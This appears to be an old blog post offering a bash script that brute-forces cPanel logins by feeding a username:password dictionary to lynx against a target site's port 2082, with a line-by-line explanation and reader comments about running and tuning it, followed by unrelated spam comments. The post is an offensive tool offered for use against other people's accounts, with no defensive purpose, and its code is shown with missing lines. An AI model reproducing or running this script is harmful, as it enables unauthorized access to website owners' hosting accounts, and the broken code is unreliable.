Hello, did you ever try to brute force a website login page and you didn't find the right tool?
it always happen, so i will explain how i did it with linux shell script.
I wrote a small script to brute force Cpanel accounts:
# Cpanel BruteForce v1.0
# Coded By Dr.Death 2008
# This is a simple script that will brute force Cpanel account
# I do not take any reponsibilty for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!
# _____ _____ _ _
# | __ \ | __ \ | | | |
# | | | |_ __| | | | ___ __ _| |_| |__
# | | | | '__| | | |/ _ \/ _` | __| '_ \
# | |__| | | _| |__| | __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|
echo ".::Cpanel BruteForcer By Dr.Death::."
echo -n "Enter domain name for the Cpanel account you want bruteforce:
n=`cat pass_list | wc -l`
for (( i=1; i <= $n; i++));
password=`sed -n "$i"p pass_list`
b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
echo trying password $password
if [ ! -z "$b" ]; then
echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun ;)"
echo "brute force complete"
echo "no luck, try better dictionary"
lets explain what we did:
- #!/usr/bin/env bash
- read site
- n=`cat pass_list | wc -l`
- for (( i=1; i <= $n; i++));
- password=`sed -n "$i"p pass_list`
for example in loop number 4 variable $i will have value of 4 and the sed comand will be like this:
"sed -n 4p pass_list" which will print the 4th line from the password file pass_list.
- b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
we use option "-dump" to dump the output instead of waiting user action, "-nolist" to disable the link list feature in dumps, "-auth=" use to set authorization ID and password for protected documents.
for example to access cpanel account for website "example.com" with username "user" and password "pass" it will be like this:
"lynx -dump -nolist -auth=user:pass http://www.example.com:2082"
so password file pass_list should include the usernames and passwords in this format: "username:password"
- if [ ! -z "$b" ]; then
Thats all falks :)
Is There Any Way To Use IT In Windows ?!! i dont know how i mean the bash script !ReplyDelete
Hello, yes you can run it with cygwin unix under windows.ReplyDelete
i tried it nice script but for sum reason lynx couldnt conectReplyDelete
Hi, try first to connect to the target website using lynx for troubleshootReplyDelete
check maybe the website doesn't run cpanel on it
hey how to run it in windows 7ReplyDelete
what file extension should i use?ReplyDelete
Great, thanx. Really useful, I added -read_timeout=30 parameter to the lynx command because I was getting stuck at try ~400.ReplyDelete
The command ends up like this:
b=`lynx -dump -nolist -read_timeout=30 -auth="$password" ""$site":80"`
How how can i edit this code if i have username and i just want to brute pass for that username ?ReplyDelete
nice post frnd i like artical thanks for the articalReplyDelete
Thanks owner for making this such a nice blog . .ReplyDelete
skin beauty tips in hindi
baal ghane karne ka totka
hari chatni recipe in urdu
kabab banane ka tariqa
castor oil in urdu
cake banane ki recipe in urdu
Owsum website i have ever visit, keep it up.ReplyDelete
Urdu Desi Totkay and Kitchen Recipe
Urdu Desi Totkay and Kitchen Recipe videos
Brilliant site ever. go to this site.ReplyDelete
Thanks for the sharing this review. Your site is awesome click here for info.ReplyDelete
The state will gather a tax of 10% on the web proceeds of sports activities betting exercise to fund implementation of the state water plan and other public functions. The quite a few 우리카지노 sports activities betting sites likeagen Judi Bolaallows you to start out|to begin} betting anytime you want. Moreover, tons of|there are numerous} reliable casinos that you simply won’t even have to search for extra before you begin betting. This means you can start betting each time and wherever you would like. Being ready for any outcome prepares you to manage your emotions.ReplyDelete